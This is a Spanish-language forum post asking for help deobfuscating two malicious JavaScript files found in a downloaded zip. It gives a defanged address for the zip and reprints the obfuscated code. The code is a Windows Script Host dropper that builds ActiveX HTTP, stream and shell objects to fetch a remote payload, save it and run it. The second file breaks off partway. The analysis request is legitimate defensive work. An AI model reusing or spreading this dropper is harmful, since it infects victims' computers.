elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  descifrar codigo de un virus js
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: descifrar codigo de un virus js  (Leído 3,728 veces)
Flamer


Desconectado Desconectado

Mensajes: 1.052


crack, crack y mas crack...


Ver Perfil WWW
descifrar codigo de un virus js
« en: 22 Julio 2018, 06:01 am »

hola amigos navegando por internet por un a cortador se me descargo un archivo zip de este sitio

ATENCION EL SIGUIENTE LINK CONTIENE UN ARCHIVO CON VIRUS

Código:
hxxp://167.99.55.222/xsx5/installer.zip


y la curiosidad me hizo abrirlo y adentro contenía 2 archivos js y pues al no entender el código lo publico aquí a ver quien me ayuda a descifrarlo

Código
  1.  
  2. function lhf(n) {
  3.    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
  4. }
  5.  
  6. function jfsx(n) {
  7.    return umubg.zqdwb + zoq[15] + crqs.czo
  8. }
  9.  
  10. function sgrl(n) {
  11.    return sicl[0] + zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lla.hre + uflh.fje + ohzn[10] + ohzn[11]
  12. }
  13.  
  14. function rdm(n) {
  15.    return sicl[0]
  16. }
  17.  
  18. function fdbg(n) {
  19.    return wxsf.xeqo + dhl[0] + chhjy[13] + dhl[0] + crqs.iff + lcx[4] + sicl[0] + qbnx[1] + mgnyo.xah + ohzn[11] + uflh.fje + ohzn[10]
  20. }
  21.  
  22. function szxyw(n) {
  23.    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + qso[3] + yggsv[3] + dhl[11] + ohzn[11] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + uflh.xpcj + yggsv[3] + dhl[11] + lcx[4] + mgnyo.xah + yggsv[16] + umubg.hzxa + wxsf.zwav + chhjy[6] + wxsf.zwav + uflh.mzrn + umubg.hzxa + wxsf.xeqo + sicl[0] + uflh.oqn + zva[6] + yggsv[14] + uflh.fje + qbnx[1] + ohzn[11] + mgnyo.xah + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
  24. }
  25.  
  26. function vfjqh(n) {
  27.    return cew[5]
  28. }
  29.  
  30. function wbkj(n) {
  31.    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + iqyl[10] + uflh.xpcj + jhv.zzg + lla.ydspg + chhjy[6] + zva[10] + yggsv[3] + ohzn[10] + crqs.rdjk + uflh.oqn + qbnx[1] + dhl[11] + yggsv[15] + cew[16] + jhv.zzg + dhl[11] + cew[16] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + ohzn[10] + umubg.hzxa
  32. }
  33.  
  34. function vror(n) {
  35.    return cew[5]
  36. }
  37.  
  38. function exmcp(n) {
  39.    return sicl[0]
  40. }
  41.  
  42. function xuqj(n) {
  43.    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lcx[4] + sicl[0] + iqyl[10] + ohzn[11] + dhl[11] + dhl[11]
  44. }
  45.  
  46. function xeve(n) {
  47.    return chhjy[13] + zva[6] + ohzn[11] + uflh.xpcj
  48. }
  49.  
  50. function dlw(n) {
  51.    return zva[0]
  52. }
  53.  
  54. function nzban(n) {
  55.    return cew[5] + mgnyo.xah + yggsv[3] + qbnx[1] + ohzn[11]
  56. }
  57.  
  58. function ouklt(n) {
  59.    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
  60. }
  61.  
  62. function txm(n) {
  63.    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
  64. }
  65.  
  66. function ntxa(n) {
  67.    return yggsv[12]
  68. }
  69.  
  70. function gmmc(n) {
  71.    return mgnyo.xah + uflh.oqn + uflh.xpcj
  72. }
  73.  
  74. function zjzno(n) {
  75.    return cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + lcx[4] + cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + cew[2] + ohzn[11] + ickh[8] + uflh.oqn + ohzn[11] + chhjy[6] + qbnx[1] + lcx[4] + uflh.mzrn + lcx[4] + chhjy[1]
  76. }
  77.  
  78. function hmnf(n) {
  79.    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
  80. }
  81.  
  82. function yci(n) {
  83.    return cew[2] + ohzn[11] + chhjy[6] + zva[6] + yggsv[16] + uflh.xpcj + chhjy[6] + ohzn[11] + crqs.iff + yggsv[16] + yggsv[14] + yggsv[15]
  84. }
  85.  
  86. function sibmy(n) {
  87.    return yggsv[14] + ohzn[11] + zva[6] + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
  88. }
  89.  
  90. function omlpg(n) {
  91.    return ohzn[11]
  92. }
  93.  
  94. function krdq(n) {
  95.    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
  96. }
  97.  
  98. function jqoe(n) {
  99.    return umubg.zqdwb + zoq[15] + crqs.czo
  100. }
  101.  
  102. function mcgy(n) {
  103.    return cew[10] + yggsv[16] + chhjy[6] + yggsv[3] + qbnx[1] + yggsv[3] + yggsv[16] + uflh.xpcj
  104. }
  105.  
  106. function emal(n) {
  107.    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
  108. }
  109.  
  110. function fwagy(n) {
  111.    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
  112. }
  113.  
  114. function lokh(n) {
  115.    return qso[5] + dhl[11] + yggsv[16] + chhjy[6] + ohzn[11]
  116. }
  117.  
  118. function yclp(n) {
  119.    return uflh.xpcj + ickh[1]
  120. }
  121.  
  122. function pvz(n) {
  123.    return chhjy[6] + uflh.oqn + zva[10] + chhjy[6] + qbnx[1] + mgnyo.xah + yggsv[3] + uflh.xpcj + jhv.zzg
  124. }
  125.  
  126. function wvt(n) {
  127.    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
  128. }
  129.  
  130. function gdnu(n) {
  131.    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1]
  132. }
  133.  
  134. function jgl(n) {
  135.    return crqs.czo + yggsv[15] + zva[6] + ohzn[11]
  136. }
  137.  
  138. function urtaq(n) {
  139.    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
  140. }
  141.  
  142. function bsj(n) {
  143.    return chhjy[6] + ohzn[11] + qbnx[1] + crqs.czo + yggsv[3] + ohzn[10] + ohzn[11] + yggsv[16] + uflh.oqn + qbnx[1] + chhjy[6]
  144. }
  145.  
  146. function fcpyg(n) {
  147.    return zoq[19]
  148. }
  149.  
  150. function rwq(n) {
  151.    return ohzn[10] + yggsv[14] + zva[0] + umubg.hzxa
  152. }
  153.  
  154. function misb(n) {
  155.    return sicl[0] + uflh.fje + uflh.aslpo + ohzn[11] + crqs.czo + yggsv[16] + chhjy[12] + yggsv[3] + dhl[11] + ohzn[11]
  156. }
  157.  
  158. function jqtrw(n) {
  159.    return uflh.fje + dhl[11]
  160. }
  161.  
  162. function mvas(n) {
  163.    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + yggsv[3] + uflh.xpcj + jhv.zzg + lcx[4] + chhjy[12] + yggsv[3] + dhl[11]
  164. }
  165.  
  166. function trg(n) {
  167.    return jhv.zzg + ickh[1] + chhjy[6] + ohzn[10] + cew[16] + uflh.aslpo + ohzn[10] + uflh.oqn + uflh.fje + zva[10] + ickh[1] + chhjy[6] + lla.ydspg + yggsv[15] + uflh.oqn + yggsv[14] + qbnx[1]
  168. }
  169.  
  170. function fyzr(n) {
  171.    return qbnx[3] + sicl[0] + yggsv[6] + qbnx[3] + ryqzj[3] + mgnyo.tvzg + lcx[4] + yggsv[6] + qbnx[3] + ryqzj[3] + crqs.rfcdv + crqs.czo + crqs.czo + cew[10]
  172. }
  173.  
  174. function glvr(n) {
  175.    return zoq[19]
  176. }
  177.  
  178. function qbvjh(n) {
  179.    return sicl[0] + yggsv[15] + chhjy[6] + qbnx[1] + ohzn[11] + ohzn[10] + chhjy[13] + zva[10] + lla.ydspg + ohzn[11] + zoq[19] + qbnx[1]
  180. }
  181.  
  182. function znbrt(n) {
  183.    return umubg.zqdwb + ohzn[11] + qbnx[1] + sicl[0] + zva[6] + ohzn[11] + zoq[19] + yggsv[3] + uflh.fje + dhl[11] + chhjy[12] + yggsv[16] + dhl[11] + yggsv[14] + ohzn[11] + mgnyo.xah
  184. }
  185.  
  186. function ssje(n) {
  187.    for (var h = [7619, 283, n, yclp("vnWU^wj0P_mO+y0")], c = (jqtrw("z!79v$czq^A.ET"), 0); c < 2393; c++)
  188.        for (var u = 0; u < 7169; u++) {
  189.            if (1828 == c) return h[c - 1828 + 2]
  190.        }
  191.    return h[1]
  192. }
  193.  
  194. function wrim() {
  195.    return new ActiveXObject(fyzr("KwgS^vDm(8A"))
  196. }
  197.  
  198. function ygqth() {
  199.    return new Date
  200. }
  201. var qso = ["Oyr", "Ldhfp", "Ksq", "f", "Ypqiz", "C"],
  202.    iqyl = [599, "Gangi", 887, "T", "e", 634, "Xqydy", 849, "Hlxp", 587, "h"],
  203.    umubg = {
  204.        zqdwb: "G",
  205.        epycx: "Jgb",
  206.        iid: "Gmhxk",
  207.        pipzu: "Hvbv",
  208.        pbcc: 146,
  209.        uxbfa: "Abdk",
  210.        xlm: 748,
  211.        iyv: 827,
  212.        lzkpe: "o",
  213.        qhsk: 362,
  214.        hzxa: "/",
  215.        sfh: ","
  216.    },
  217.    cew = ["Vakm", 682, "R", "Nvuv", "Ket", "W", "e", 423, 684, 19, "P", "7", "$", "z", "a", "Juif", "w", "Dlge", "Juxva", 191],
  218.    zva = [" ", 879, 969, 951, 692, ",", "p", "7169", 297, "30000", "b", "V", "7619"],
  219.    ohzn = [426, "1", "c", "8", "g", 150, 62, "*", 300, "Jhdbq", "m", "e"],
  220.    zoq = ["Gzqba", 680, 743, "Zbc", "Fmwik", "Gjsm", 604, "3", "Ihewl", "0", "P", "2393", "Imiw", "p", "Khf", "E", "Otiv", "Hset", 312, "c"],
  221.    yggsv = [341, "*", 834, "i", "Szl", "h", "X", "eval", "p", "Szhsm", "m", "Tqz", "\\", "Anqnz", "d", "y", "o"],
  222.    ryqzj = [828, "B", "Rprq", "L", "Xstbu", "Z", "Kyg"],
  223.    rglf = {
  224.        swaue: "2",
  225.        unj: 8,
  226.        sri: 213,
  227.        qdr: "Q",
  228.        tbjs: "Bgtf",
  229.        fxvvu: "Fnzm",
  230.        vloc: 361,
  231.        wsyk: 132,
  232.        dfys: "60000",
  233.        ego: "h",
  234.        jhi: 448,
  235.        adnu: "Xuser",
  236.        eck: "Dly",
  237.        nnt: 589,
  238.        jrshr: 926,
  239.        bqj: 322,
  240.        vivr: "Vjc",
  241.        gbz: "Ydq",
  242.        xcxp: "Powwx",
  243.        mpz: "Pkmy"
  244.    },
  245.    jhv = {
  246.        efvno: "Bds",
  247.        elma: "Ntk",
  248.        zzg: "g",
  249.        pzg: 595,
  250.        didg: 860,
  251.        wbjl: ","
  252.    },
  253.    uflh = {
  254.        tfanu: "Baqt",
  255.        oqn: "u",
  256.        ukpl: "9",
  257.        gxn: 904,
  258.        lqmr: "200",
  259.        xpcj: "n",
  260.        aslpo: "v",
  261.        kzqpj: "1828",
  262.        mzrn: "5",
  263.        czd: "Suux",
  264.        hxpgq: "1",
  265.        fje: "a"
  266.    },
  267.    lcx = [554, "Ujtnj", "i", 173, ".", 512],
  268.    pcd = ["Dvx", 26, "Yvr", "b", "n", "0"],
  269.    dhl = ["D", 628, 680, "d", 536, "&", "K", "Cxgf", "Qwlul", 432, "6", "l", "Ijtwg", ";", 513, "Hlbmu", "K"],
  270.    qqzsc = {
  271.        esp: "K",
  272.        lprg: 590,
  273.        hfvw: 762,
  274.        yas: 311,
  275.        rfle: "Xprxo",
  276.        wmlkb: "340"
  277.    },
  278.    qbnx = ["ActiveXObject", "t", 473, "M", "E"],
  279.    wxsf = {
  280.        ojbw: "d",
  281.        gblt: "(",
  282.        mnds: 889,
  283.        zwav: "x",
  284.        jzsnh: "K",
  285.        dly: 737,
  286.        sjvcn: "q",
  287.        xeqo: "A",
  288.        toayq: "Zath",
  289.        pll: 960,
  290.        hhj: "6",
  291.        kac: "Nncvp",
  292.        uosf: "Bfzgz",
  293.        klk: "283",
  294.        scdit: 493,
  295.        fbam: "6",
  296.        ksl: "G",
  297.        dcmrh: "8"
  298.    },
  299.    mgnyo = {
  300.        tvzg: "2",
  301.        xxvy: "E",
  302.        hjxn: "O",
  303.        bsz: 76,
  304.        xah: "r",
  305.        anyl: "^",
  306.        banrv: "S",
  307.        uvgo: 427,
  308.        enqg: "Yre",
  309.        qiyc: "!",
  310.        tfgtq: "Aeur",
  311.        xmiq: 658,
  312.        gxt: "H",
  313.        zxayj: 844,
  314.        mhlh: 764
  315.    },
  316.    crqs = {
  317.        jur: "M",
  318.        iff: "B",
  319.        fyeu: "Qtj",
  320.        zynw: "E",
  321.        negjj: "Erk",
  322.        rfcdv: "H",
  323.        nhd: "u",
  324.        uea: "4",
  325.        rdjk: "k",
  326.        czo: "T",
  327.        rwx: 293,
  328.        ewr: 155,
  329.        ovm: 630,
  330.        dwf: "Jjo",
  331.        ols: "Dtntj",
  332.        qym: "27"
  333.    },
  334.    chhjy = ["Sgsp", "1", "Sgkdb", "5", 505, "J", "s", "Mncp", "Kxcw", "X", ":", 902, "F", "O"],
  335.    lla = {
  336.        ydspg: "j",
  337.        hre: "N",
  338.        omug: "i",
  339.        vgxje: "c",
  340.        kjnt: "-",
  341.        ngs: "Tpjzh",
  342.        fxdp: "("
  343.    },
  344.    sicl = ["S", ")", "Ekt", 517, "Jye", 566, "Nakdd", "2", 966, "Ynn", "1200000", "O", 577, "J", 198, 579, 516, "Uqmqx", "Pnvx"],
  345.    ickh = [645, "z", "C", ":", 579, 564, "Gtca", "Klss", "q", 831, "Gkasc", "Fzk"],
  346.    adq = ["Yagz", "Nkkx", "Wadgu", 267, "7", "9", "v", "k", "Date", 148],
  347.    qwitd = [-27],
  348.    ozl = [340],
  349.    jldvt = [],
  350.    rxiql = [7],
  351.    upkrl = [];
  352. upkrl[0] = szxyw("kwRItA_g8I");
  353. for (var svoyw = [0], bien = [sibmy("T+A!pYFY.z@7M")], naft = !1, xib = ssje(rdm("k^J&c1H_pV")), hkext = eval(vfjqh("RX6.@bbUu.Ki.") + xib + gdnu("&I%PCHgWiQTMfew")), ppkqs = ActiveXObject, oax = ssje(exmcp("to)i.5W;Pr0")), hhy = 0; hhy < upkrl[krdq("ts6JnjK8jS")]; hhy++) {
  354.    var ohdy = ssje(omlpg("6zPp$2GgXu@Rm.")),
  355.        laqo = new ppkqs(oax + mvas("&.^9x8b6hYZN4HF") + ohdy + qbvjh("S;E6vARY5G3"));
  356.    try {
  357.        var sfu = laqo[znbrt("PU2u.NkI3q6Q")](2),
  358.            rokqj = new ppkqs(zjzno("6pD!EIEso8Xi")),
  359.            ucua = 3e4,
  360.            tzjoc = 6e4,
  361.            azvtb = 3e4,
  362.            otleu = 12e5;
  363.        rokqj[bsj("3_GYaOTwN(2pZ")](ucua, tzjoc, azvtb, otleu);
  364.        try {
  365.            for (; trg("DK^9o59@UfKJ6^q");) {
  366.                var dnez = wrim();
  367.                if (dnez[hmnf("fokP*&RS&Iu")](jfsx("R:SGW1az*ztwJm"), wbkj("(ORL4t3xtqDH"), !1), dnez[lhf("FVINJHNP&@dog^")](), 200 != dnez[ouklt("ha!73w$CvnBTy1")]) break
  368.            }
  369.        } catch (n) {}
  370.        if (5 == svoyw[hhy]) {
  371.            var wpc = hkext[sgrl("^AJ+6Qm@ya(j")],
  372.                gifmj = wpc[pvz("C@@X_34t5@-k")](0, wpc[emal("70guj2N,-iWmb")] - 3);
  373.            upkrl[hhy] += gifmj
  374.        }
  375.        sfu += ntxa("_CYoX6EyEi(Gj$"), sfu += bien[hhy];
  376.        var yzt = 5;
  377.        do {
  378.            rokqj[wvt("3BMbECdG6+n")](jqoe("jC5(99%w%6IFJ!"), upkrl[hhy], 0), rokqj[txm("bX.Km)JmP)O")](), yzt--
  379.        } while (200 != rokqj[urtaq("q_R*XFt!g;")] && yzt);
  380.        if (200 == rokqj[fwagy("$z-coFC0TCr")]) {
  381.            var sca = new ppkqs(vror("(GBq5mlqKu_kIDy") + xib + xuqj("eS9Y6HyV0v"));
  382.            if (8 == svoyw[hhy] && (svoyw[hhy] = 0), svoyw[hhy] <= 3) {
  383.                var eqyh = new ppkqs(fdbg("7a,Bd6K.6ND^FWl"));
  384.                eqyh[xeve("_Y$BkGDYp)-6")](), eqyh[jgl("MNbcc$)3fUmN")] = 1, eqyh[mcgy("(0KcZ!4;%XBE5YH")] = 0, eqyh[nzban("DmG1XPy:WXnU")](rokqj[yci("DBgWzCK)zInp.s")]), eqyh[misb("I2I_bBDotbmg")](sfu), eqyh[lokh("d5uyi,h9N+.,jO")](), svoyw[hhy] || sca[gmmc("qnh!lMgrN8OCJu")](ssje(glvr("CpVAuS,Myq-LW&H")) + rwq("_$Q-ElY8GjqyhH") + ssje(fcpyg("JwmqfJuvl+X")) + dlw("(Kn*GxoxnokyP^") + sfu, 0, 0)
  385.            }
  386.        }
  387.    } catch (n) {}
  388. }
  389.  
  390.  


y este es el otro



Código
  1. function wmnhg(n) {
  2.    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + niu.mxq + zhi[0] + rov[1] + lko.fbmgm + qit[5] + qit[8] + niu.mywhk + yqo[1] + vvbs.jnws + zhi[0] + rov[1] + qit[8] + niu.fsvd + yqo[1] + tzyr.nayhc + rov[7] + qit[5] + rov[7] + pqjb[7] + tzyr.nayhc + niu.uneo + niu.fih + lko.cpwe + vvbs.rmuqx + put.hykw + tzyr.spfjs + put.poihe + lko.fbmgm + niu.fsvd + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
  3. }
  4.  
  5. function plh(n) {
  6.    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + pqjb[8] + lko.fbmgm + pqjb[4] + lko.fbmgm + rov[7] + sbfwq.yljev + vvbs.rmuqx + bcx[5] + tzyr.spfjs + rov[7] + sbfwq.yljev + opymo.rsdnz + qit[8] + niu.mywhk + yqo[1] + pqjb[4] + tzyr.nayhc
  7. }
  8.  
  9. function ssdie(n) {
  10.    return rov[16] + niu.fsvd + zhi[0] + put.poihe + lko.fbmgm
  11. }
  12.  
  13. function mkwm(n) {
  14.    return niu.fih + tzyr.spfjs + divuu.eplv + lko.fbmgm + qit[1] + yqo[1] + put.qcx + zhi[0] + rov[1] + lko.fbmgm
  15. }
  16.  
  17. function vupzg(n) {
  18.    return rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + qit[8] + rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + glb.nthy + lko.fbmgm + yqo[5] + lko.cpwe + lko.fbmgm + qit[5] + put.poihe + qit[8] + pqjb[7] + qit[8] + kfa[6]
  19. }
  20.  
  21. function cwk(n) {
  22.    return pqjb[13] + opymo.jjuae + qit[1]
  23. }
  24.  
  25. function lqlrb(n) {
  26.    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
  27. }
  28.  
  29. function padva(n) {
  30.    return lko.fbmgm
  31. }
  32.  
  33. function vme(n) {
  34.    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe
  35. }
  36.  
  37. function nlc(n) {
  38.    return glb.nthy + lko.fbmgm + qit[5] + vvbs.rmuqx + yqo[1] + vvbs.jnws + qit[5] + lko.fbmgm + opymo.gedag + yqo[1] + put.hykw + opymo.rsdnz
  39. }
  40.  
  41. function wnpk(n) {
  42.    return niu.mywhk
  43. }
  44.  
  45. function fqlvs(n) {
  46.    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + zhi[0] + vvbs.jnws + pnh[10] + qit[8] + put.qcx + zhi[0] + rov[1]
  47. }
  48.  
  49. function qyno(n) {
  50.    return pqjb[4] + put.hykw + kfo.amuzg + tzyr.nayhc
  51. }
  52.  
  53. function sehl(n) {
  54.    return rov[12] + yqo[1] + qit[5] + zhi[0] + put.poihe + zhi[0] + yqo[1] + vvbs.jnws
  55. }
  56.  
  57. function yjf(n) {
  58.    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + qit[8] + niu.fih + bcx[5] + lko.fbmgm + rov[1] + rov[1]
  59. }
  60.  
  61. function vssa(n) {
  62.    return vvbs.jnws + pqjb[8]
  63. }
  64.  
  65. function twy(n) {
  66.    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
  67. }
  68.  
  69. function frt(n) {
  70.    return put.tsf
  71. }
  72.  
  73. function ycxqu(n) {
  74.    return tzyr.spfjs + rov[1]
  75. }
  76.  
  77. function pcf(n) {
  78.    return gba.mgjj + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
  79. }
  80.  
  81. function sekmh(n) {
  82.    return rov[16]
  83. }
  84.  
  85. function vgjl(n) {
  86.    return pqjb[13] + opymo.jjuae + qit[1]
  87. }
  88.  
  89. function thpfk(n) {
  90.    return niu.fih + opymo.rsdnz + qit[5] + put.poihe + lko.fbmgm + pqjb[4] + gba.mgjj + sbfwq.yljev + niu.lvg + lko.fbmgm + niu.mywhk + put.poihe
  91. }
  92.  
  93. function mrfu(n) {
  94.    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
  95. }
  96.  
  97. function axvhz(n) {
  98.    return niu.fsvd + lko.cpwe + vvbs.jnws
  99. }
  100.  
  101. function thk(n) {
  102.    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
  103. }
  104.  
  105. function wzuge(n) {
  106.    return niu.mywhk
  107. }
  108.  
  109. function yzzhd(n) {
  110.    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
  111. }
  112.  
  113. function nla(n) {
  114.    return niu.fih + niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + divuu.mse + tzyr.spfjs + pqjb[4] + lko.fbmgm
  115. }
  116.  
  117. function pgig(n) {
  118.    return niu.fih
  119. }
  120.  
  121. function yorid(n) {
  122.    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
  123. }
  124.  
  125. function mizvs(n) {
  126.    return opymo.rsdnz + yqo[1] + rov[1] + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
  127. }
  128.  
  129. function zgmt(n) {
  130.    return kfo.amuzg
  131. }
  132.  
  133. function fpu(n) {
  134.    return rov[7] + tzyr.spfjs + pqjb[3] + pqjb[3] + put.poihe + put.hykw + niu.lvg + bcx[5] + zhi[0] + lko.fbmgm + vvbs.jnws + lko.cpwe + sbfwq.yljev + zhi[0] + bcx[10] + rov[7] + niu.lvg + bcx[5] + pqjb[8]
  135. }
  136.  
  137. function ksp(n) {
  138.    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
  139. }
  140.  
  141. function yhinm(n) {
  142.    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
  143. }
  144.  
  145. function aic(n) {
  146.    return niu.fih
  147. }
  148.  
  149. function yhiwo(n) {
  150.    return rov[16]
  151. }
  152.  
  153. function ilgq(n) {
  154.    return qit[5] + lko.fbmgm + put.poihe + qit[1] + zhi[0] + pqjb[4] + lko.fbmgm + yqo[1] + lko.cpwe + put.poihe + qit[5]
  155. }
  156.  
  157. function rvl(n) {
  158.    return rwnw.slevm + rov[1] + yqo[1] + qit[5] + lko.fbmgm
  159. }
  160.  
  161. function ujgwe(n) {
  162.    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
  163. }
  164.  
  165. function rjg(n) {
  166.    return psp[2] + niu.fih + kfo.tlxoz + psp[2] + pqjb[14] + pucy[3] + qit[8] + kfo.tlxoz + psp[2] + pqjb[14] + put.begwe + qit[1] + qit[1] + rov[12]
  167. }
  168.  
  169. function nof(n) {
  170.    return qit[5] + lko.cpwe + sbfwq.yljev + qit[5] + put.poihe + niu.fsvd + zhi[0] + vvbs.jnws + pnh[10]
  171. }
  172.  
  173. function mipjn(n) {
  174.    return qit[1] + opymo.rsdnz + vvbs.rmuqx + lko.fbmgm
  175. }
  176.  
  177. function eda(n) {
  178.    return pqjb[13] + lko.fbmgm + put.poihe + niu.fih + vvbs.rmuqx + lko.fbmgm + niu.mywhk + zhi[0] + tzyr.spfjs + rov[1] + put.qcx + yqo[1] + rov[1] + put.hykw + lko.fbmgm + niu.fsvd
  179. }
  180.  
  181. function zxoum(n) {
  182.    return niu.uneo + psp[1] + gba.mgjj + psp[1] + opymo.gedag + qit[8] + niu.fih + put.poihe + niu.fsvd + lko.fbmgm + tzyr.spfjs + pqjb[4]
  183. }
  184.  
  185. function bsqoi(n) {
  186.    for (var o = [7619, 283, n, vssa(",n1r%SSV_-yZ^")], u = (ycxqu("O1.Ew7OI(-IsmI"), 0); u < 2393; u++)
  187.        for (var t = 0; t < 7169; t++) {
  188.            if (1828 == u) return o[u - 1828 + 2]
  189.        }
  190.    return o[1]
  191. }
  192.  
  193. function azqp() {
  194.    return new ActiveXObject(rjg("7,$ppXb3Hj"))
  195. }
  196.  
  197. function nvy() {
  198.    return new Date
  199. }
  200. var pqjb = [241, "Dufzd", 286, "k", "m", "Hnf", 640, "5", "z", 658, 471, "Citte", "c", "G", "L"],
  201.    glb = {
  202.        iuxag: "V",
  203.        nthy: "R",
  204.        fqz: "Jlavq",
  205.        cmzc: "4",
  206.        qvyiw: "F",
  207.        leflp: 393,
  208.        pwalc: 160,
  209.        jxbr: "i",
  210.        lgt: "Pxzt",
  211.        vqne: "O",
  212.        vniif: 892,
  213.        cmg: "Zfrw",
  214.        fffr: "v",
  215.        rrxr: 826,
  216.        dnfj: "("
  217.    },
  218.    psp = ["0", "D", "M", "Ztzh", "Vmh", 293, "W", 311, "6"],
  219.    lko = {
  220.        nnff: "L",
  221.        cpwe: "u",
  222.        euf: "Yuu",
  223.        tux: 936,
  224.        fbmgm: "e",
  225.        ecjw: "Z",
  226.        qvvff: "1828"
  227.    },
  228.    vvbs = {
  229.        phg: 520,
  230.        rmuqx: "p",
  231.        yubsx: "Ruiak",
  232.        bnzv: 890,
  233.        niy: "7169",
  234.        jnws: "n",
  235.        ywqc: 919,
  236.        orx: 469,
  237.        ejk: 948,
  238.        thnn: 562,
  239.        oceqj: "Not",
  240.        kjhlw: "Cfd",
  241.        hpfbk: "Cqa"
  242.    },
  243.    opymo = {
  244.        docm: ":",
  245.        uro: "60000",
  246.        idqx: "Hsy",
  247.        gacqa: "1",
  248.        jjuae: "E",
  249.        udrn: 919,
  250.        bqjtz: "Date",
  251.        zpb: 146,
  252.        rsdnz: "y",
  253.        gedag: "B",
  254.        bde: 151,
  255.        zfy: "eval"
  256.    },
  257.    yqo = ["K", "o", "Parxh", 115, 597, "q", "p", 900, "Zvlbb", "c"],
  258.    pucy = ["2", 911, "2393", "2", "Ijrl", "8", 572],
  259.    kfa = ["J", "Tpgqs", "Yfz", "3", "Dadem", "Exra", "1", "Qvzc", 800, "Yjylt", 433, 585, "Rhbfr", "m", "Coxuw", "r", "r"],
  260.    sbfwq = {
  261.        kru: 726,
  262.        jhmia: "Bebrr",
  263.        zzp: "Sjq",
  264.        lvyv: "T",
  265.        tldql: 907,
  266.        yljev: "b",
  267.        ymo: "Azzx"
  268.    },
  269.    qit = ["Gon", "T", "e", "E", "Hka", "s", "Asc", "E", ".", 80, 727, 248, "2", "e", "r", "4"],
  270.    rov = ["Lgge", "l", 54, "Tskh", "$", 91, "Eghv", "x", "7", 705, "200", "Ozby", "P", "Eixr", ";", "Okhay", "W"],
  271.    isksi = {
  272.        benn: 478,
  273.        sdo: "F",
  274.        pkadk: "3",
  275.        pkrlp: "H",
  276.        aaw: 713,
  277.        upu: "Uov",
  278.        btx: "Vzl"
  279.    },
  280.    tzyr = {
  281.        nayhc: "/",
  282.        nja: "-",
  283.        rhn: 182,
  284.        acgb: 804,
  285.        tdfil: "o",
  286.        azis: "Jutn",
  287.        spfjs: "a",
  288.        nxqlb: "Maj",
  289.        imsao: 995
  290.    },
  291.    pnh = [103, "Mkbt", "w", "5", "A", "Udxc", "Mkhlf", 193, "%", "Nfjw", "g", 161, "J", "i", 316, 593],
  292.    gba = {
  293.        ariae: "Nnk",
  294.        qwxv: "2",
  295.        mzd: 347,
  296.        lrj: "D",
  297.        xba: 817,
  298.        njrs: "Gwjcf",
  299.        cvu: "1200000",
  300.        izgfd: "S",
  301.        zrjc: "Gdqid",
  302.        iatqy: "g",
  303.        yrxhc: "May",
  304.        mgjj: "O",
  305.        tlvvq: "E"
  306.    },
  307.    bcx = ["O", "Ctqo", "Mnj", 998, "289", "h", 883, "Taqis", "Fysx", "Eclw", "w", 844, "Litn", 559],
  308.    divuu = {
  309.        mse: "N",
  310.        mwdpo: 718,
  311.        eso: "F",
  312.        eplv: "v",
  313.        ftcn: "Ont",
  314.        iftxt: "b",
